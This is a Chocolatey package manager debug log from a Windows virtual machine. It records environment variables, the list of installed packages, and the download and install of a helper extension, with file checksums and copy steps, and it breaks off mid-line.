('User')\n2026-06-08 18:07:08,309 4968 [DEBUG] -   * 'TMP'='C:\\Users\\vagrant\\AppData\\Local\\Temp' ('User')\n2026-06-08 18:07:08,309 4968 [DEBUG] -   * 
'ChocolateyLastPathUpdate'='134254154512741611' ('User')\n2026-06-08 18:07:08,309 4968 [DEBUG] -   * 'ComSpec'='C:\\Windows\\system32\\cmd.exe' ('Machine')\n2026-06-08 18:07:08,325 4968 [DEBUG] -   * 'DriverData'='C:\\Windows\\System32\\Drivers\\DriverData' ('Machine')\n2026-06-08 18:07:08,325 4968 [DEBUG] -   * 'OS'='Windows_NT' ('Machine')\n2026-06-08 18:07:08,325 4968 [DEBUG] -   * 'Path'='C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\OpenSSH\\;C:\\ProgramData\\chocolatey\\bin' ('Machine')\n2026-06-08 18:07:08,325 4968 [DEBUG] -   * 'PATHEXT'='.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' ('Machine')\n2026-06-08 18:07:08,339 4968 [DEBUG] -   * 'PROCESSOR_ARCHITECTURE'='AMD64' ('Machine')\n2026-06-08 18:07:08,339 4968 [DEBUG] -   * 'PSModulePath'='C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules' ('Machine')\n2026-06-08 18:07:08,339 4968 [DEBUG] -   * 'TEMP'='C:\\Windows\\TEMP' ('Machine')\n2026-06-08 18:07:08,356 4968 [DEBUG] -   * 'TMP'='C:\\Windows\\TEMP' ('Machine')\n2026-06-08 18:07:08,356 4968 [DEBUG] -   * 'USERNAME'='SYSTEM' ('Machine')\n2026-06-08 18:07:08,356 4968 [DEBUG] -   * 'windir'='C:\\Windows' ('Machine')\n2026-06-08 18:07:08,356 4968 [DEBUG] -   * 'NUMBER_OF_PROCESSORS'='10' ('Machine')\n2026-06-08 18:07:08,372 4968 [DEBUG] -   * 'PROCESSOR_LEVEL'='6' ('Machine')\n2026-06-08 18:07:08,372 4968 [DEBUG] -   * 'PROCESSOR_IDENTIFIER'='Intel64 Family 6 Model 85 Stepping 7, GenuineIntel' ('Machine')\n2026-06-08 18:07:08,372 4968 [DEBUG] -   * 'PROCESSOR_REVISION'='5507' ('Machine')\n2026-06-08 18:07:08,372 4968 [DEBUG] -   * 'ChocolateyInstall'='C:\\ProgramData\\chocolatey' ('Machine')\n2026-06-08 18:07:08,622 4968 [DEBUG] - Unable to get parent process for 'choco'. 
Ignoring...\n2026-06-08 18:07:08,637 4968 [DEBUG] - Process Tree: Chocolatey CLI => Chocolatey CLI => powershell => powershell => cmd => sshd => sshd => sshd => services\n2026-06-08 18:07:08,685 4968 [DEBUG] - Updating User Agent to 'Chocolatey Command Line/2.7.2 (sshd, Chocolatey CLI) via NuGet Client/6.4.1 (Microsoft Windows NT 10.0.17763.0)'.\n2026-06-08 18:07:09,262 4968 [DEBUG] - Running list with the following filter = ''\n2026-06-08 18:07:09,282 4968 [DEBUG] - --- Start of List ---\n2026-06-08 18:07:09,356 4968 [DEBUG] - Process Tree: Chocolatey CLI => Chocolatey CLI => powershell => powershell => cmd => sshd => sshd => sshd => services\n2026-06-08 18:07:09,371 4968 [DEBUG] - Updating User Agent to 'Chocolatey Command Line/2.7.2 (sshd, Chocolatey CLI) via NuGet Client/6.4.1 (Microsoft Windows NT 10.0.17763.0)'.\n2026-06-08 18:07:09,387 4968 [DEBUG] - Resolving resource PackageSearchResource for source C:\\ProgramData\\chocolatey\\lib\n2026-06-08 18:07:10,667 4968 [DEBUG] - chocolatey 2.7.2\n2026-06-08 18:07:10,685 4968 [DEBUG] - chocolatey-windowsupdate.extension 1.0.5\n2026-06-08 18:07:10,700 4968 [DEBUG] - KB2919355 1.0.20160915\n2026-06-08 18:07:10,715 4968 [DEBUG] - KB2919442 1.0.20160915\n2026-06-08 18:07:10,715 4968 [DEBUG] - KB2999226 1.0.20181019\n2026-06-08 18:07:10,732 4968 [DEBUG] - KB3035131 1.0.3\n2026-06-08 18:07:10,747 4968 [DEBUG] - KB3118401 1.0.5\n2026-06-08 18:07:10,762 4968 [DEBUG] - virtualbox-guest-additions-guest.install 7.2.8\n2026-06-08 18:07:10,778 4968 [DEBUG] - --- End of List ---\n2026-06-08 18:07:10,809 4968 [DEBUG] - Resolving resource PackageMetadataResource for source c:\\cached-packages\n2026-06-09 18:35:56,998 4968 [DEBUG] - Resolving resource PackageMetadataResource for source https://community.chocolatey.org/api/v2/\n2026-06-09 18:35:57,915 4968 [INFO ] - [NuGet]   GET https://community.chocolatey.org/api/v2/Packages(Id='disable-ms-msdt',Version='1.0.0')\n2026-06-09 
18:35:58,086 4968 [INFO ] - [NuGet]   OK https://community.chocolatey.org/api/v2/Packages(Id='disable-ms-msdt',Version='1.0.0') 159ms\n2026-06-09 18:35:58,321 4968 [DEBUG] - Resolving resource DependencyInfoResource for source c:\\cached-packages\n2026-06-09 18:35:59,276 4968 [DEBUG] - Resolving resource DependencyInfoResource for source https://community.chocolatey.org/api/v2/\n2026-06-09 18:35:59,290 4968 [INFO ] - [NuGet]   CACHE https://community.chocolatey.org/api/v2/Packages(Id='disable-ms-msdt',Version='1.0.0')\n2026-06-09 18:36:00,243 4968 [INFO ] - [NuGet]   CACHE https://community.chocolatey.org/api/v2/$metadata\n2026-06-09 18:36:00,291 4968 [INFO ] - [NuGet]   GET https://community.chocolatey.org/api/v2/FindPackagesById()?id='chocolatey-fastanswers.extension'&semVerLevel=2.0.0\n2026-06-09 18:36:00,399 4968 [INFO ] - [NuGet]   OK https://community.chocolatey.org/api/v2/FindPackagesById()?id='chocolatey-fastanswers.extension'&semVerLevel=2.0.0 112ms\n2026-06-09 18:36:00,477 4968 [INFO ] - [NuGet]   GET http://community.chocolatey.org/api/v2/FindPackagesById?id='chocolatey-fastanswers.extension'&$skiptoken='1758305999083','0.0.1','chocolatey-fastanswers.extension'\n2026-06-09 18:36:00,633 4968 [INFO ] - [NuGet]   OK http://community.chocolatey.org/api/v2/FindPackagesById?id='chocolatey-fastanswers.extension'&$skiptoken='1758305999083','0.0.1','chocolatey-fastanswers.extension' 136ms\n2026-06-09 18:36:00,947 4968 [INFO ] - [NuGet] Resolving dependency information took 0 ms\n2026-06-09 18:36:00,979 4968 [INFO ] - [NuGet]   GET https://community.chocolatey.org/api/v2/Packages(Id='chocolatey-fastanswers.extension',Version='0.0.2.2')\n2026-06-09 18:36:01,071 4968 [INFO ] - [NuGet]   OK https://community.chocolatey.org/api/v2/Packages(Id='chocolatey-fastanswers.extension',Version='0.0.2.2') 86ms\n2026-06-09 18:36:01,103 4968 [DEBUG] - Resolving resource DownloadResource for source https://community.chocolatey.org/api/v2/\n2026-06-09 18:36:01,181 
4968 [DEBUG] - Attempting to delete file \"\".\n2026-06-09 18:36:01,199 4968 [INFO ] - Downloading package from source 'https://community.chocolatey.org/api/v2/'\n2026-06-09 18:36:01,199 4968 [DEBUG] - Package download location 'https://community.chocolatey.org/api/v2/package/chocolatey-fastanswers.extension/0.0.2.2'\n2026-06-09 18:36:01,258 4968 [INFO ] - [NuGet]   GET https://community.chocolatey.org/api/v2/package/chocolatey-fastanswers.extension/0.0.2.2\n2026-06-09 18:36:01,540 4968 [INFO ] - [NuGet]   OK https://community.chocolatey.org/api/v2/package/chocolatey-fastanswers.extension/0.0.2.2 285ms\n2026-06-09 18:36:01,602 4968 [INFO ] - [NuGet] Acquiring lock for the installation of chocolatey-fastanswers.extension 0.0.2.2\n2026-06-09 18:36:01,714 4968 [INFO ] - [NuGet] Acquired lock for the installation of chocolatey-fastanswers.extension 0.0.2.2\n2026-06-09 18:36:02,885 4968 [INFO ] - [NuGet] Installed chocolatey-fastanswers.extension 0.0.2.2 from https://community.chocolatey.org/api/v2/ with content hash 4ugOiehjPXN9ehrr7CmEALUfyLel7M63f5l4Zbuui4wSaQM9xgir7nxOChii/YGZYBPwG01bxz1gJFwSictd5A==.\n2026-06-09 18:36:02,915 4968 [DEBUG] - Skipping package hash validation as feature 'usePackageHashValidation' is not enabled.\n2026-06-09 18:36:02,977 4968 [INFO ] - [NuGet] Adding package 'chocolatey-fastanswers.extension.0.0.2.2' to folder 'C:\\ProgramData\\chocolatey\\lib'\n2026-06-09 18:36:03,244 4968 [INFO ] - [NuGet] Added package 'chocolatey-fastanswers.extension.0.0.2.2' to folder 'C:\\ProgramData\\chocolatey\\lib'\n2026-06-09 18:36:03,260 4968 [DEBUG] - Attempting to delete file \"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\chocolatey-fastanswers.extension/0.0.2.2\\chocolatey-fastanswers.extension.0.0.2.2.nupkg\".\n2026-06-09 18:36:03,260 4968 [DEBUG] - Attempting to delete file \"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\chocolatey-fastanswers.extension/0.0.2.2\\.nupkg.metadata\".\n2026-06-09 
18:36:03,276 4968 [DEBUG] - Attempting to delete file \"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\chocolatey-fastanswers.extension/0.0.2.2\\chocolatey-fastanswers.extension.0.0.2.2.nupkg.sha512\".\n2026-06-09 18:36:03,276 4968 [INFO ] - \nchocolatey-fastanswers.extension v0.0.2.2 (forced) [Approved]\n2026-06-09 18:36:03,398 4968 [INFO ] - chocolatey-fastanswers.extension package files install completed. Performing other installation steps.\n2026-06-09 18:36:03,774 4968 [DEBUG] - Capturing package files in 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension'\n2026-06-09 18:36:03,774 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\chocolatey-fastanswers.extension.nupkg'\n  with checksum 'FBA8F1BF1832175C1620A8C99260CE63'\n2026-06-09 18:36:03,789 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\chocolatey-fastanswers.extension.nuspec'\n  with checksum '90E302921AFD6B25029F4FB0E37A0F36'\n2026-06-09 18:36:03,789 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\chocolateyinstall-helpers.psm1'\n  with checksum '3DB76ABFF352B2B31CBC75921B878A5D'\n2026-06-09 18:36:03,789 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-Is32.ps1'\n  with checksum 'EFDE1E251305B484C62BAD5FD4843C58'\n2026-06-09 18:36:03,807 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-Is64.ps1'\n  with checksum '8D81A6047FE37765124CA170D024381C'\n2026-06-09 18:36:03,807 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsAMDCPU.ps1'\n  with checksum 'B2ACDB98A75468A614E73C4358836C16'\n2026-06-09 18:36:03,822 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsAMDVideo.ps1'\n  with checksum 
'CAE3CBA9F0DB6BB95BDEF80FA93FCD11'\n2026-06-09 18:36:03,822 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsARMCPU.ps1'\n  with checksum 'E335AB7EBCFD4B358B240EC3A980FCC5'\n2026-06-09 18:36:03,822 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsHyperV.ps1'\n  with checksum '34E9D441E1C1E4A0A4733CF3D08CF24F'\n2026-06-09 18:36:03,837 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsInDomain.ps1'\n  with checksum '3DFE5C92C1E885DC4F32F39700163F49'\n2026-06-09 18:36:03,837 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsIntelCPU.ps1'\n  with checksum '217C9913F0F76AF58310AD112D678755'\n2026-06-09 18:36:03,837 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsIntelVideo.ps1'\n  with checksum '59ADC0234E8C86B0C019E26C4FB7DBD5'\n2026-06-09 18:36:03,853 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsKVM.ps1'\n  with checksum '3CEEFE79AB88CED867F3C2883960BDFA'\n2026-06-09 18:36:03,853 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsMobile.ps1'\n  with checksum 'D072E3346388E862D58EEB61FADE1293'\n2026-06-09 18:36:03,868 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsNvidiaVideo.ps1'\n  with checksum 'BFAD3256D45BC0050CF912F721C39713'\n2026-06-09 18:36:03,868 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsSSD.ps1'\n  with checksum '6A4F3F45948CD3046D3EA9DE985037CB'\n2026-06-09 18:36:03,868 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVirtualBox.ps1'\n  with checksum 
'C14E2427FD7E29D07BCE03F14C196C91'\n2026-06-09 18:36:03,868 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVM.ps1'\n  with checksum '33C5599D27D1DCCF04E7D17A0AEE4449'\n2026-06-09 18:36:03,884 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVMware.ps1'\n  with checksum '1447C1F98A79D75C92A3BC5C0996CBC7'\n2026-06-09 18:36:03,884 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin10.ps1'\n  with checksum '2105DD274CD2662D791CEA40652C9903'\n2026-06-09 18:36:03,884 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin11.ps1'\n  with checksum '67E96A3F5DC70F68CE2B6227526F2EBD'\n2026-06-09 18:36:03,901 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin7.ps1'\n  with checksum '57FC84EC7EB69BA5966FECC34CBE1007'\n2026-06-09 18:36:03,901 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin8.ps1'\n  with checksum 'A6B6CB4C2DE5D8E85F1FD3BDCAD9F21F'\n2026-06-09 18:36:03,919 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin80.ps1'\n  with checksum '88E31E6EC19D09785D334F267B2FF45D'\n2026-06-09 18:36:03,919 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin81.ps1'\n  with checksum 'EF83A82859194B1A73EB3A18ECA1CCFA'\n2026-06-09 18:36:03,932 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinEdu.ps1'\n  with checksum 'C49066E8C6C5F27D6D62F256D17EDBC5'\n2026-06-09 18:36:03,948 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinEnt.ps1'\n  with checksum 
'78645B460495920C9E2B78E3046BB3EB'\n2026-06-09 18:36:03,948 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinHome.ps1'\n  with checksum '679B402638E9E087A2EB837CFF9DE614'\n2026-06-09 18:36:03,948 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinPro.ps1'\n  with checksum 'D037F7ECC534050B6E401A2B0B66CC58'\n2026-06-09 18:36:03,964 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer.ps1'\n  with checksum 'B9D58DCC4646B675D3D151FDAFA734AF'\n2026-06-09 18:36:03,964 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2008.ps1'\n  with checksum 'C18CFE831EE863996B08BB4CAA48144A'\n2026-06-09 18:36:03,978 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2008R2.ps1'\n  with checksum '0977F15F5E8D73CA80459F7B56700341'\n2026-06-09 18:36:03,978 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2012.ps1'\n  with checksum '0E084FBDD139EFBA5EA348D5BCAA5764'\n2026-06-09 18:36:03,978 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2012R2.ps1'\n  with checksum '4B75E93E80B9803DC1A1B94692C7BCAA'\n2026-06-09 18:36:03,993 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2016.ps1'\n  with checksum '64E440FB4AD36DCD2818B1BFE1EC4676'\n2026-06-09 18:36:03,993 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2019.ps1'\n  with checksum 'D5EFA3A01193AD10EFFEBA61AB5489F9'\n2026-06-09 18:36:04,012 4968 [DEBUG] -  Found 
'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2022.ps1'\n  with checksum 'C6D7B639210FBC1FBFEB24E60622B83C'\n2026-06-09 18:36:04,012 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerDatacenter.ps1'\n  with checksum '34E97A250BA09333E89B2786257B973C'\n2026-06-09 18:36:04,025 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerEssentials.ps1'\n  with checksum 'A87543351C19BECB97C64DF9DE861B09'\n2026-06-09 18:36:04,025 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerFoundation.ps1'\n  with checksum '128FD3DDF37EB204D710A05A7E8782F0'\n2026-06-09 18:36:04,025 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerSBS.ps1'\n  with checksum '58C034E640E3D63E0CC83864585A3B86'\n2026-06-09 18:36:04,040 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerStandard.ps1'\n  with checksum '2D281A2C03AC24B779B7ABC446A9E8C1'\n2026-06-09 18:36:04,040 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerStorage.ps1'\n  with checksum '46F2A8F994F668BD57568838CBE92D02'\n2026-06-09 18:36:04,040 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerWeb.ps1'\n  with checksum 'FE4589697B0465A3D8CAE108EA997FF8'\n2026-06-09 18:36:04,056 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinWorkstation.ps1'\n  with checksum '53B0A793B9476B04B31BDE56E0AC30E5'\n2026-06-09 18:36:04,056 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsXen.ps1'\n  with checksum 
'2FB7192315EE3A14E35A339F8C897EA1'\n2026-06-09 18:36:04,056 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-NuspecInfo.ps1'\n  with checksum 'E5422AD665ECD9517237E09D84BC4C77'\n2026-06-09 18:36:04,072 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-PendingReboot.ps1'\n  with checksum '22EC2FE26CBA9572BBB9A213F312ACA3'\n2026-06-09 18:36:04,072 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinName.ps1'\n  with checksum '37CC42EB12EF31A01EAC25927FE00C7C'\n2026-06-09 18:36:04,072 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerBuild.ps1'\n  with checksum 'A84D4278467B3EAB48B341143D62B2C0'\n2026-06-09 18:36:04,089 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerMajor.ps1'\n  with checksum 'B7394CFD5A06F6060CD6C50E1BEEB3C7'\n2026-06-09 18:36:04,089 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerMinor.ps1'\n  with checksum 'DA5740343F8AF56CF567197A1C898B90'\n2026-06-09 18:36:04,134 4968 [DEBUG] - Attempting to create directory \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\".\n2026-06-09 18:36:04,149 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\chocolateyinstall-helpers.psm1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\chocolateyinstall-helpers.psm1\".\n2026-06-09 18:36:04,149 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-Is32.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-Is32.ps1\".\n2026-06-09 18:36:04,167 4968 [DEBUG] - Attempting to copy 
\"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-Is64.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-Is64.ps1\".\n2026-06-09 18:36:04,192 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsAMDCPU.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsAMDCPU.ps1\".\n2026-06-09 18:36:04,196 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsAMDVideo.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsAMDVideo.ps1\".\n2026-06-09 18:36:04,216 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsARMCPU.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsARMCPU.ps1\".\n2026-06-09 18:36:04,216 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsHyperV.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsHyperV.ps1\".\n2026-06-09 18:36:04,227 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsInDomain.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsInDomain.ps1\".\n2026-06-09 18:36:04,227 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsIntelCPU.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsIntelCPU.ps1\".\n2026-06-09 18:36:04,227 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsIntelVideo.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsIntelVideo.ps1\".\n2026-06-09 18:36:04,244 4968 
[DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsKVM.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsKVM.ps1\".\n2026-06-09 18:36:04,244 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsMobile.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsMobile.ps1\".\n2026-06-09 18:36:04,259 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsNvidiaVideo.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsNvidiaVideo.ps1\".\n2026-06-09 18:36:04,259 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsSSD.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsSSD.ps1\".\n2026-06-09 18:36:04,275 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVirtualBox.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsVirtualBox.ps1\".\n2026-06-09 18:36:04,275 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVM.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsVM.ps1\".\n2026-06-09 18:36:04,291 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVMware.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsVMware.ps1\".\n2026-06-09 18:36:04,291 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin10.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin10.ps1\".\n2026-06-09 
18:36:04,308 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin11.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin11.ps1\".\n2026-06-09 18:36:04,322 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin7.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin7.ps1\".\n2026-06-09 18:36:04,322 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin8.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin8.ps1\".\n2026-06-09 18:36:04,322 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin80.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin80.ps1\".\n2026-06-09 18:36:04,338 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin81.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin81.ps1\".\n2026-06-09 18:36:04,338 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinEdu.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinEdu.ps1\".\n2026-06-09 18:36:04,353 4968 